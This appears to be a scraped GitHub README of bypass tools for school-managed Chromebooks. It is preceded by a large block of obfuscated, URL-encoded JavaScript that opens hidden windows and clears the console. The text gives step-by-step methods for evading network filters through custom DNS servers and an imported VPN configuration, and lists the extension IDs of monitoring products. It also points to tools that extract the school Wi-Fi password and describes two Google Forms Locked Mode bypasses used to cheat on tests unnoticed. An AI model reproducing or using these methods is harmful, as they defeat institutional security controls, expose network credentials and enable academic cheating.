i%3A-0xa6*0x3b+-0x1182+0x37c4%29%7Bh%3DT%5B%27indexOf%27%5D%28h%29%3B%7Dfor%28let%20D%3D0x11d*-0x1+-0x9d*0x1+-0x22*-0xd%2Cq%3Dl%5B%27length%27%5D%3BD%3Cq%3BD++%29%7BN+%3D%27%25%27+%28%2700%27+l%5B%27charCodeAt%27%5D%28D%29%5B%27toString%27%5D%28-0x210a+0x1459+0xcc1*0x1%29%29%5B%27slice%27%5D%28-%28-0x793+-0x1*-0xd91+-0x5fc*0x1%29%29%3B%7Dreturn%20decodeURIComponent%28N%29%3B%7D%3Bconst%20R%3Dfunction%28A%2CT%29%7Blet%20l%3D%5B%5D%2CN%3D0x1*0x1145+-0x93a*0x4+0x13a3%2CW%2Ch%3D%27%27%3BA%3DF%28A%29%3Blet%20D%3Bfor%28D%3D0x1*-0x1e83+0x1*0x2627+-0x146*0x6%3BD%3C-0xf92*0x2+0x532+-0x1af2*-0x1%3BD++%29%7Bl%5BD%5D%3DD%3B%7Dfor%28D%3D0x1*0x1edd+-0x5a9*0x1+0x2*-0xc9a%3BD%3C0x23ff+0xad*-0x20+0x1e9*-0x7%3BD++%29%7BN%3D%28N+l%5BD%5D+T%5B%27charCodeAt%27%5D%28D%25T%5B%27length%27%5D%29%29%25%28-0x13e*0x1f+0x1033+0x174f%29%2CW%3Dl%5BD%5D%2Cl%5BD%5D%3Dl%5BN%5D%2Cl%5BN%5D%3DW%3B%7DD%3D-0x1baf+-0x12e8+-0x1*-0x2e97%2CN%3D0x1*0x1883+0x1141+0x63*-0x6c%3Bfor%28let%20q%3D-0x11b*0x1d+-0x3*-0x8ac+0x11*0x5b%3Bq%3CA%5B%27length%27%5D%3Bq++%29%7BD%3D%28D+%280xd35+-0x1764+0x10*0xa3%29%29%25%280x132d*0x2+-0x16da+-0xe80%29%2CN%3D%28N+l%5BD%5D%29%25%280x1*-0xf91+-0x175*0x12+0x88f*0x5%29%2CW%3Dl%5BD%5D%2Cl%5BD%5D%3Dl%5BN%5D%2Cl%5BN%5D%3DW%2Ch+%3DString%5B%27fromCharCode%27%5D%28A%5B%27charCodeAt%27%5D%28q%29%5El%5B%28l%5BD%5D+l%5BN%5D%29%25%28-0x5*0x34c+-0x1*0xaf1+0x1c6d%29%5D%29%3B%7Dreturn%20h%3B%7D%3Bw%5B%27vJpagG%27%5D%3DR%2CC%3Darguments%2Cw%5B%27nOjZNt%27%5D%3D%21%21%5B%5D%3B%7Dconst%20v%3DK%5B-0x166d+0x186e+0x9*-0x39%5D%2CH%3DG+v%2CY%3DC%5BH%5D%3Bif%28%21Y%29%7Bif%28w%5B%27paiGzb%27%5D%3D%3D%3Dundefined%29%7Bconst%20A%3Dfunction%28T%29%7Bthis%5B%27tHPCMF%27%5D%3DT%2Cthis%5B%27zhZNab%27%5D%3D%5B-0x39*-0x31+-0x220a+0x1722%2C0x25aa*0x1+-0x54e*0x1+-0x205c*0x1%2C-0x5ae+-0x25*-0x6+-0x4d*-0x10%5D%2Cthis%5B%27DHhDxH%27%5D%3Dfunction%28%29%7Breturn%27newState%27%3B%7D%2Cthis%5B%27RiaToM%27%5D%3D%27%5Cx5cw+%5Cx20*%5Cx5c%28%5Cx5c%29%5Cx20*%7B%5Cx5cw+%5Cx20*%27%2Cthis%5B%27ROcrsb%27%5D%3D%27%5B%5Cx27%7C%5Cx22%5D.+%5B%5Cx27%7C%5Cx22%5D%3B%3F%5Cx20*%7D%27%3B%7D%3BA%5B%27prototype%27%5D%5B%27NpNvWy%27%5D%3Dfunction%28%29%7Bconst%20T%3Dnew%20RegExp%28this%5B%27RiaToM%27%5D+this%5B%27ROcrsb%27%5D%29%2Cl%3DT%5B%27test%27%5D%28this%5B%27DHhDxH%27%5D%5B%27toString%27%5D%28%29%29%3F--this%5B%27zhZNab%27%5D%5B0xc79+0xe71+-0x1ae9%5D%3A--this%5B%27zhZNab%27%5D%5B-0x3*-0x6a1+-0xc47*0x3+0x9*0x1e2%5D%3Breturn%20this%5B%27nmCwWY%27%5D%28l%29%3B%7D%2CA%5B%27prototype%27%5D%5B%27nmCwWY%27%5D%3Dfunction%28T%29%7Bif%28%21Boolean%28%7ET%29%29return%20T%3Breturn%20this%5B%27JWAvRD%27%5D%28this%5B%27tHPCMF%27%5D%29%3B%7D%2CA%5B%27prototype%27%5D%5B%27JWAvRD%27%5D%3Dfunction%28T%29%7Bfor%28let%20l%3D0xa0+0x1*-0xf7+0x1*0x57%2CN%3Dthis%5B%27zhZNab%27%5D%5B%27length%27%5D%3Bl%3CN%3Bl++%29%7Bthis%5B%27zhZNab%27%5D%5B%27push%27%5D%28Math%5B%27round%27%5D%28Math%5B%27random%27%5D%28%29%29%29%2CN%3Dthis%5B%27zhZNab%27%5D%5B%27length%27%5D%3B%7Dreturn%20T%28this%5B%27zhZNab%27%5D%5B-0x520+-0xc43+-0x1163*-0x1%5D%29%3B%7D%2Cnew%20A%28w%29%5B%27NpNvWy%27%5D%28%29%2Cw%5B%27paiGzb%27%5D%3D%21%21%5B%5D%3B%7Do%3Dw%5B%27vJpagG%27%5D%28o%2Cg%29%2CC%5BH%5D%3Do%3B%7Delse%20o%3DY%3Breturn%20o%3B%7D%2Cw%28C%2Ca%29%3B%7Dconst%20G%3D%28function%28%29%7Blet%20K%3D%21%21%5B%5D%3Breturn%20function%28o%2CF%29%7Bconst%20v%3DK%3Ffunction%28%29%7Bfunction%20l%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20w%28F-%20-0xe6%2CY%29%3B%7Dif%28F%29%7Bconst%20H%3DF%5Bl%280xe5%2C0xe1%2C0xbf%2C0xe1%2C0xe5%2C%27VT@u%27%2C0xbf%29%5D%28o%2Carguments%29%3Breturn%20F%3Dnull%2CH%3B%7D%7D%3Afunction%28%29%7B%7D%3Breturn%20K%3D%21%5B%5D%2Cv%3B%7D%3B%7D%28%29%29%2Cg%3DG%28this%2Cfunction%28%29%7Bconst%20o%3D%7B%7D%3Bfunction%20N%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20w%28F-0x380%2CR%29%3B%7Do%5BN%280x527%2C0x51a%2C0x53a%2C0x55a%2C0x53c%2C0x550%2C%27E3LE%27%29%5D%3DN%280x543%2C0x562%2C0x54e%2C0x52e%2C0x55e%2C0x527%2C%27W4jq%27%29+N%280x520%2C0x550%2C0x52e%2C0x540%2C0x539%2C0x523%2C%27r%23v%25%27%29%3Bconst%20F%3Do%3Breturn%20g%5BN%280x568%2C0x565%2C0x560%2C0x563%2C0x56b%2C0x569%2C%27ltzn%27%29+%27g%27%5D%28%29%5BN%280x4fb%2C0x534%2C0x51d%2C0x4f9%2C0x514%2C0x526%2C%273GLD%27%29%5D%28F%5BN%280x556%2C0x549%2C0x549%2C0x54b%2C0x55d%2C0x521%2C%27T09K%27%29%5D%29%5BN%280x544%2C0x550%2C0x551%2C0x53f%2C0x545%2C0x57a%2C%27R%24s0%27%29+%27g%27%5D%28%29%5BN%280x523%2C0x52c%2C0x523%2C0x546%2C0x512%2C0x54b%2C%27oarp%27%29+%27ctor%27%5D%28g%29%5BN%280x50b%2C0x505%2C0x529%2C0x510%2C0x50f%2C0x507%2C%27JQEt%27%29%5D%28F%5B%27XnmWR%27%5D%29%3B%7D%29%3Bfunction%20Q%28%29%7Bconst%20s%3D%5B%27dM/cG8kserCP%27%2C%27emoVD8oUrCodW7m%27%2C%27fWz5cJbIWOq%27%2C%27CZZcKCkxeW%27%2C%27W7lcHKioya%27%2C%27amkXBcHcys8%27%2C%27kSk/BCoKWQrr%27%2C%27W4HkW6FdG8kGkCkH%27%2C%27gtWGW7xdHXu%27%2C%27WP0zW4X4pCoHxa%27%2C%27WRVcJCoubmkgkmkm%27%2C%27b8kjW5HDW7H5fr0%27%2C%27W5zgW6ldISkZkCkN%27%2C%27w8kRoCocFq%27%2C%27W5TxW7ddJ8k8z8oO%27%2C%27sCkdEGjpBxy%27%2C%27pZPPwW%27%2C%27W6ldIW4ZW73dGCkx%27%2C%27WO0oWQ8pdCklaG%27%2C%27BNK2aeZdMmkB%27%2C%27eLVdU8oYWPq%27%2C%27zmoqWRCnxmo/E2XfW5ZdGJpdQW%27%2C%27W6/cVKa5whVdOq%27%2C%27AmoabCkIW7pdSre%27%2C%27tmoHmSkWW7mrb8o5WOdcJCojW54%27%2C%27DchcMCkSjW%27%2C%27zSosWRqixSkzifHlW7tdVa%27%2C%27WRnlCrpdVq%27%2C%27wahcH1bdW4FdMa%27%2C%27tWW8z8kBj8k0pSkodSk1W7vw%27%2C%27W6JcTbT7ta%27%2C%27geiIFdZcJ1C%27%2C%27mmkUW6j1la%27%2C%27W514WP9DWQBdV3K%27%2C%27jSoxjCkDW5C%27%2C%27WQRcG8oAemkveSkoW47cRSok%27%2C%27WQqeWP44cW%27%2C%27W6a0WOfhW4KrhW%27%2C%27db04etb9WP0%27%2C%27fCofng0FmYnGr8ouCMWh%27%2C%27wwZcNupcLq%27%2C%27WRfQW4DzWP9tqMRcGCohCZZdPW%27%2C%27W5hcIxWzpSoGWQNdTmkZW4G%27%2C%27W6JcUraGaW4G%27%2C%27W6dcJaH8W63dICkm%27%2C%27gf3dMW4BW5tdNa%27%2C%27w2X2WRxcKe/dMmkRevldMCkk%27%2C%27fhddUCkFoSk6eq%27%2C%27WP3dLHXAhCo/WQO%27%2C%27kHtdRuCmWOBcHq%27%2C%27W6NcRmowW6a5sW4%27%2C%27W7FdLSoidConBSkr%27%2C%27W70NW7S7pSkCW48%27%2C%27W4BcHmogsmkyqfy%27%2C%27WRvUW4fBWPjtgg/cJSouyZG%27%2C%27DM7cMdtdQSobdG%27%2C%27eG9noWu%27%2C%27mdBcPMdcJ8kvW7BdGq%27%2C%27WRNcOCoE%27%2C%27wLT/nSopCmoU%27%2C%27pYVdJNhdGSoKbHTzWRm%27%2C%27qgWIxXG%27%2C%27WQRcHCoyeSofC8otWO/cISotqvxdK2y%27%2C%27W7a0WQuDW5qifa%27%2C%27WQxcU1eUtwZdQW%27%2C%27rSoRubu+eq%27%2C%27W4NcNfabyW%27%2C%27WR4JEcScpti%27%2C%27CMpcL3e%27%2C%27mJLOrqJdH8oB%27%2C%27ghCXW6BdGXJdIq%27%2C%27DWtcOMXQ%27%2C%27W4VcMCogvmou%27%2C%27WPNdLmkCeCoffbi%27%2C%27WRXrB8o5WQvZWRO%27%2C%27amoGqWa7f8kU%27%2C%27bhJcP8k6qe5r%27%2C%27W5RcK8odx8kjfq%27%2C%27WQa0W7DYESkCW5G%27%2C%27W7zJWQz6y8kPWPRdTSkYW5xdKG%27%2C%27nZ5HwrlcMmoP%27%5D%3BQ%3Dfunction%28%29%7Breturn%20s%3B%7D%3Breturn%20Q%28%29%3B%7Dg%28%29%2C%28%28%28%29%3D%3E%7Bconst%20K%3D%7B%27Zjbcz%27%3Aj%28%27W4jq%27%2C0x2af%2C0x2a9%2C0x2a8%2C0x2ae%2C0x2bc%2C0x2a8%29+j%28%27%28l%5Dd%27%2C0x2aa%2C0x2a1%2C0x286%2C0x28b%2C0x27c%2C0x275%29+j%28%27E%5Dql%27%2C0x291%2C0x29d%2C0x298%2C0x2a1%2C0x2bd%2C0x277%29+j%28%27JQEt%27%2C0x267%2C0x260%2C0x281%2C0x272%2C0x291%2C0x25f%29+j%28%27z%5BQ4%27%2C0x290%2C0x265%2C0x27b%2C0x25e%2C0x29f%2C0x259%29+%27nnectiv%27+j%28%275DGf%27%2C0x276%2C0x2ba%2C0x29b%2C0x298%2C0x291%2C0x277%29+j%28%27z%5BQ4%27%2C0x2b6%2C0x2bb%2C0x2aa%2C0x2ad%2C0x2a5%2C0x2b1%29%2C%27PaUhe%27%3A%27about%3Ab%27+j%28%27CbbX%27%2C0x27e%2C0x27c%2C0x2a0%2C0x284%2C0x2ae%2C0x29f%29%2C%27EYuJk%27%3Afunction%28F%2Cv%29%7Breturn%20F+v%3B%7D%2C%27aLbHC%27%3Afunction%28F%2Cv%29%7Breturn%20F%28v%29%3B%7D%2C%27ffZBA%27%3A%27%3Cscript%27+%27%3Ewindow%27+%27.onmess%27+j%28%27aUk6%27%2C0x29c%2C0x28f%2C0x289%2C0x26e%2C0x262%2C0x26b%29+j%28%27iKyB%27%2C0x2a7%2C0x2a5%2C0x296%2C0x28e%2C0x2b4%2C0x275%29+j%28%27ltzn%27%2C0x297%2C0x2d5%2C0x2b1%2C0x2d2%2C0x28d%2C0x2a2%29+j%28%27%28YAw%27%2C0x2b1%2C0x27c%2C0x29d%2C0x29f%2C0x2bd%2C0x27a%29+j%28%27Enlg%27%2C0x2b7%2C0x285%2C0x2ad%2C0x2be%2C0x2ae%2C0x28f%29+j%28%27iKyB%27%2C0x2be%2C0x2e0%2C0x2bf%2C0x2ab%2C0x2d4%2C0x2e8%29+%27cript%3E%27%2C%27jfDZg%27%3Afunction%28F%2Cv%29%7Breturn%20F+v%3B%7D%2C%27fUwZE%27%3Afunction%28F%2Cv%29%7Breturn%20F+v%3B%7D%2C%27EIXlj%27%3Aj%28%27aUk6%27%2C0x2a8%2C0x2d7%2C0x2c0%2C0x2ad%2C0x2e2%2C0x2b2%29+%27404%5Cx20Not%27+j%28%275DGf%27%2C0x296%2C0x2a1%2C0x291%2C0x272%2C0x285%2C0x2ba%29+%27/title%3E%27+j%28%27pYHg%27%2C0x2c2%2C0x2d3%2C0x2be%2C0x2e3%2C0x2cb%2C0x2ab%29+j%28%27%299kQ%27%2C0x29c%2C0x2b6%2C0x2b7%2C0x2ce%2C0x2d8%2C0x2c2%29+j%28%27E%5Dql%27%2C0x28f%2C0x2b2%2C0x29a%2C0x27c%2C0x29d%2C0x294%29+%270px%3B%5Cx22%3E%3C%27+j%28%27irrp%27%2C0x2e1%2C0x2d2%2C0x2bd%2C0x2d9%2C0x298%2C0x2e1%29+%27src%3D%5Cx22%27%2C%27aKIhe%27%3Aj%28%27%28l%5Dd%27%2C0x274%2C0x284%2C0x27c%2C0x29e%2C0x256%2C0x27f%29%2C%27GqQLZ%27%3Aj%28%27CeOX%27%2C0x268%2C0x2a5%2C0x280%2C0x293%2C0x29b%2C0x288%29+j%28%27CeOX%27%2C0x280%2C0x29e%2C0x29c%2C0x29c%2C0x289%2C0x2a4%29%2C%27MeRBk%27%3Afunction%28F%2Cv%29%7Breturn%20F%21%3Dv%3B%7D%7D%3Bfunction%20o%28%29%7Bconst%20F%3D%7B%7D%3BF%5B%27nKVXY%27%5D%3DK%5Bi%28-0x21%2C-0x46%2C-0x17%2C-0x36%2C%27VT@u%27%2C-0xf%2C-0x20%29%5D%3Bfunction%20i%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20j%28H%2Co-0xc0%2CF-0x197%2CK-%20-0x29e%2CH-0xaf%2CY-0xf0%2CR-0x19e%29%3B%7Dconst%20v%3DF%3Bfunction%20H%28%29%7Bfunction%20W%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20i%28F-0x1e0%2Co-0x1bd%2CF-0x4b%2Cv-0x37%2CR%2CY-0x166%2CR-0xa1%29%3B%7Dreturn%20v%5BW%280x1df%2C0x1f9%2C0x1e9%2C0x20e%2C0x210%2C0x1f1%2C%27EzSQ%27%29%5D%3B%7Dlet%20Y%3Dwindow%5B%27open%27%5D%28K%5B%27PaUhe%27%5D%2Ci%28-0xf%2C-0xd%2C-0x26%2C-0x17%2C%27E3LE%27%2C-0x33%2C-0x35%29%29%2CR%3DK%5B%27EYuJk%27%5D%28i%280x4%2C0xd%2C0x2%2C-0xf%2C%27z%5BQ4%27%2C0xd%2C0xc%29+i%280x14%2C0x15%2C-0x13%2C0x13%2C%27oarp%27%2C0xd%2C0x12%29+%27%2C%27%2CK%5Bi%280xe%2C-0x11%2C-0x2%2C0x1e%2C%27oEsR%27%2C0x25%2C-0x16%29%5D%28encodeURIComponent%2CK%5Bi%280x26%2C0x11%2C0x19%2C0x6%2C%27oarp%27%2C0x26%2C0x1e%29%5D%29%29%3BY%5Bi%280x0%2C-0x6%2C-0x4%2C0xa%2C%27%5ENwA%27%2C-0x7%2C0x13%29+%27t%27%5D%5Bi%280x10%2C0x3%2C-0x13%2C0x2c%2C%2714JQ%27%2C-0x11%2C-0xc%29%5D%28K%5B%27jfDZg%27%5D%28K%5B%27fUwZE%27%5D%28K%5B%27EIXlj%27%5D%2CR%29%2Ci%28-0x12%2C0x14%2C-0x15%2C-0xc%2C%27E3LE%27%2C-0xd%2C0x15%29+%27%3D%5Cx22100%25%5Cx22%27+i%28-0x17%2C-0x39%2C-0x34%2C-0x31%2C%27eXMl%27%2C-0xc%2C-0x26%29+i%280x1%2C0x7%2C-0x7%2C-0x18%2C%27CeOX%27%2C-0x3%2C-0x1f%29+i%280x29%2C0x17%2C0x28%2C0x2d%2C%27rD*f%27%2C0x32%2C0x3f%29+i%280x23%2C0x0%2C0x49%2C0x31%2C%273GLD%27%2C0x1a%2C0x44%29+i%28-0x1a%2C0xd%2C-0x1e%2C-0x14%2C%273GLD%27%2C-0x3b%2C0xa%29+%27rame%3E%3C/%27+i%28-0x1b%2C-0x3a%2C0xb%2C-0x21%2C%273GLD%27%2C-0xa%2C-0x30%29%29%29%3Blet%20A%3DY%5B%27documen%27+%27t%27%5D%5Bi%280x25%2C0x3%2C0x40%2C-0x3%2C%27Cr%5BR%27%2C0x4%2C0x10%29+%27lector%27%5D%28K%5Bi%280x2b%2C0x48%2C0x1e%2C0x14%2C%27Y%5B%25s%27%2C0x1a%2C0x4f%29%5D%29%3BA%5B%27onload%27%5D%3D%28%29%3D%3EA%5Bi%28-0x9%2C0x4%2C-0xd%2C-0xe%2C%27ZR0%5B%27%2C-0xa%2C0x3%29+i%28-0xc%2C-0x31%2C-0xc%2C-0x28%2C%27DVnL%27%2C-0x18%2C-0x19%29%5D%5B%27postMes%27+i%28-0x1f%2C-0x25%2C-0x4%2C-0xa%2C%27T09K%27%2C-0x1a%2C-0xb%29%5D%28H%28%29%2C%27*%27%29%3B%7Dif%28K%5Bj%28%27%5ENwA%27%2C0x2b2%2C0x292%2C0x2b0%2C0x2bc%2C0x2be%2C0x29b%29%5D%28window%5Bj%28%27s@0N%27%2C0x267%2C0x2a5%2C0x285%2C0x28c%2C0x2a6%2C0x292%29+%27n%27%5D%5B%27hash%27%5D%2C%27%23%27%29%29window%5Bj%28%27YN%5Bl%27%2C0x2b2%2C0x2c3%2C0x2bb%2C0x2ca%2C0x297%2C0x2b5%29+%27eprint%27%5D%3Do%3Bfunction%20j%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20w%28v-0xeb%2CK%29%3B%7Dwindow%5Bj%28%27cbIj%27%2C0x259%2C0x285%2C0x27e%2C0x280%2C0x285%2C0x266%29%5D%5Bj%28%27pYHg%27%2C0x2ce%2C0x2d2%2C0x2c6%2C0x2b8%2C0x2bd%2C0x2ea%29%5D%28Object%5Bj%28%27CeOX%27%2C0x26b%2C0x29a%2C0x28b%2C0x290%2C0x28f%2C0x288%29+j%28%27E%5Dql%27%2C0x27c%2C0x2b9%2C0x293%2C0x298%2C0x278%2C0x26b%29+%27es%27%5D%28new%20Error%28%29%2C%7B%27message%27%3A%7B%27get%27%28%29%7Bfunction%20h%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20j%28Y%2Co-0xf2%2CF-0x154%2CF-0xd9%2CH-0x6%2CY-0x2b%2CR-0x9c%29%3B%7Dwindow%5Bh%280x35a%2C0x35a%2C0x366%2C0x353%2C0x361%2C%27L1iO%27%2C0x33e%29%5D%5B%27clear%27%5D%28%29%2Cwindow%5Bh%280x395%2C0x38b%2C0x391%2C0x36a%2C0x381%2C%27%28YAw%27%2C0x36b%29+%27n%27%5D%3DK%5Bh%280x35f%2C0x34a%2C0x35b%2C0x337%2C0x377%2C%27W4jq%27%2C0x34f%29%5D%3B%7D%7D%2C%27toString%27%3A%7B%7D%7D%29%29%3B%7D%29%28%29%29%3B%3C%2Fscript%3E

Caub + Dns + Proxy Editor

This is a tool to edit managed network configurations to block updates, change the DNS and proxy settings, even if its greyed out in the settings

here is the latest update: https://gist.github.com/Brandon421-ops/9cf837a5c36fc8c4f4ea526d032ed4d0

or

https://mega.nz/file/I7MRVA4C#d3cjIyQLz6iSd_D_BPCekprMjfzDk8aTOAKcitupqPw

if these are both blocked download it on a pc and upload it to your school accout google drive

credit to gabe077 in TN

OmadaDNS Block requests from certain filtering extensions

(New York) Name Server: 66.94.105.229

(Germany) Name Server: 167.86.91.171

OmadaDNS is an AdGuard Home DNS server running these lists. It has no logs, and it uses Quad9 upstream.

cauDNS Blocks requests for updates and certain extensions, and allows users to set custom name servers

This DNS server is configured to networks by importing an ONC file.

ONC Setup

Instructions

  1. Navigate to chrome://network#state.

  2. Locate the section for the Wi-Fi network that is currently connected.

  3. Expand the section by clicking the plus (+).

  4. Select all the text within the expanded part of the section.

  5. Copy the selection from the context menu or by pressing Ctrl + C.

  6. On the cauDNS page, paste the copied text into the input field by pressing Ctrl + V.

Name Servers

  1. 167.86.91.171

  2. 66.94.105.229

  3. 213.109.163.210

  4. 92.60.37.102

Network Bypassing Via DNS A bypass for any network filters

A network filter is something that blocks website on the actual network instead of the operating system. Thus you can't disable with exploits like LTBEEF or LTMEAT.

IP Server 1: 8.8.8.8 in all boxes

IP Server 2: 1.1.1.1 in the first box and 1.0.0.1 in the second box the third and fourth box stay 0.0.0.0

Step 1. Go to your settings

Step 2. Click on the wifi your using rn then click it again.

Step 3. Scroll down until you see network once you see the option click it.

Step 4. Scroll down until you find custom name servers now once you find the option click it.

Step 5. Paste in one of the IP Server's.

Note: If IP Server 1 doesn't work then use IP Server 2 if IP Server 2 doesn't work then try using IP Server 1 if they both don't work your screwed

Network Bypassing Via VPN A bypass for any network filters

A network filter is something that blocks website on the actual network instead of the operating system. Thus you can't disable with exploits like LTBEEF or LTMEAT.

Go to this link once you have downloaded the ONC file. Goto chrome://network and press "Import ONC File". You will have know if it worked if it says: "Network imported: 1". Then click on the time, or goto settings. Find VPN, click on it and click on the "Haven VPN" it will say "Connected" and now you are free.

If chrome://network is blocked, start bawling your eyes out and beat up your IT manager.

List of tools
Extension ID's
Extension Name Extension ID
GoGuardian haldlgldplgnggkjaafhelgiaglafanh
Mobile Guardian (installed) fgmafhdohjkdhfaacgbgclmfgkgokgmb
Mobile Guardian (setup) nglbmaiijljohnphofifiodoommladkj
Securly (webstore) iheobagjkfklnlikgihanlhcddjoihkg
Securly joflmkccibkooplaeoinecjbmdebglab
Securly (old) iheobagjkfklnlikgihanlhcddjoihkg
Securly Classroom jfbecfmiegcjddenjhlbhlikcbfmnafd
Blocksi pgmjaihnmedpcdkjcgigocogcbffgkbn
iBoss kmffehbidlalibfeklaefnckpidbodff
Fortiguard igbgpehnbmhgdgjbhkkpedommgmfbeao
Cisco Umbrella jcdhmojfecjfmbdpchihbeilohgnbdci
NetRef khfdeghnhlpdfeenmdofgcbilkngngcp
ContentKeeper jdogphakondfdmcanpapfahkdomaicfa
CK-Authenticator G3 odoanpnonilogofggaohhkdkdgbhdljp
Hapara kbohafcopfpigkjdimdcdgenlhkmhbnc
Smoothwall jbldkhfglmgeihlcaeliadhipokhocnm
Linewize ddfbkhpmcdbciejenfcolaaiebnjcbfc
LANSchool baleiojnjpgeojohhhfbichcodgljmnj
LanSchool Web Helper honjcnefekfnompampcpmcdadibmjhlk
Lightspeed Filter Agent adkcpkpghahmbopkjchobieckeoaoeem
Lightspeed Device Insider Agent njdniclgegijdcdliklgieicanpmcngj
InterCLASS Filtering Service jbddgjglgkkneonnineaohdhabjbgopi
IMTLazarus cgigopjakkeclhggchgnhmpmhghcbnaf
Impero Backdrop jjpmjccpemllnmgiaojaocgnakpmfgjg
InterSafe GatewayConnection Agent ecjoghccnjlodjlmkgmnbnkdcbnjgden
Gopher Buddy cgbbbjmgdpnifijconhamggjehlamcif
Connect for Chrome - Education ddfbkhpmcdbciejenfcolaaiebnjcbfc

If your blocker is not on this list: go to chrome://extensions, details on your blockers extension, then copy the code in the url (after chrome://extensions/?id=). Here's all the good places to find your Blocker id chrome://extensions chrome://extensions-internals chrome://process-internals Search up the blocker ID on google if you have too If you can't find them in those URL'S Manualy then try to do ctrl + f and type in your blocker name or ID

Chrome100 Recovery image directory

Website

GitHub

Updates View channel versions & download recovery images

Website

Changes Chromium changes & requests

Website

Wi-Fi Password Extracter Extract your schools Wi-Fi password

Sync Internals Password Extractor

Netlog Policy Password Extractor

Policy Password Tool

Google Forms Locked Mode Bypass

Patched On Newer Versions

If you don't have the ability to enable flags this won't work. You can use a Chrome flag to use Google while being within a locked google form, no notifications will be sent to your teacher. You must enable the Chrome flag named window-layout-menu by visiting chrome://flags/#window-layout-menu and selecting enabled. Before entering a form, first create a new window and hold your cursor over the maximize button; This will open a menu, in this menu pin the window You can now enter the Google form in the non-floating window, the floating window will stay as an overlay on top of your form.

IMPORTANT: Do NOT close/minimize the floating window while in the form as it will cause the window to not be able to be opened anymore while staying in the form. If a teacher comes close, u can just drag the window to the corner so they dont see lmao.

Google Forms Locked Mode Bypass 2

Another Google Forms Locked Mode Bypass

This is for educational purposes only, use only on forms that you own

How does this work?

So, you want to know how the genie does his tricks, eh? Well, I'll tell you.

  1. Google is dumb
  2. They forgot to add any checks to make sure locked mode is actually enabled 💀
  3. All that happens when you open a locked Google Form is that it submits a form via POST request that responds with the test (which would usually be locked, but we skipped the part where it tells Chrome to lock itself)
  4. The token sent with the POST request is easily scraped from the form login page

What potential is there for issues by using this?

  1. Every time you make the POST request after the first time, Google emails the owner of the form
  2. The form object on the page gets deleted when the "visibilitychanged" event is fired 2a. The "visibilitychanged" event is only fired by complete obfuscation, not partial or loss of focus.
  3. You're screwed if you don't follow the directions to the T

Link: https://tinyurl.com/LockedModeBypass2023c

Update February 29, 2024

  • Fixed Google Forms assigned through Google Classroom
  • To receive this update delete your existing sheet and copy again (if you use @unknown-user's website you can disregard and continue using as normal with the new ability to use Google Classroom forms)

For those who want the site without going through Apps Script and Google Sheets @unknown-user made a site: https://formb.pegoku.com/

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 70.5%
  • HTML 29.5%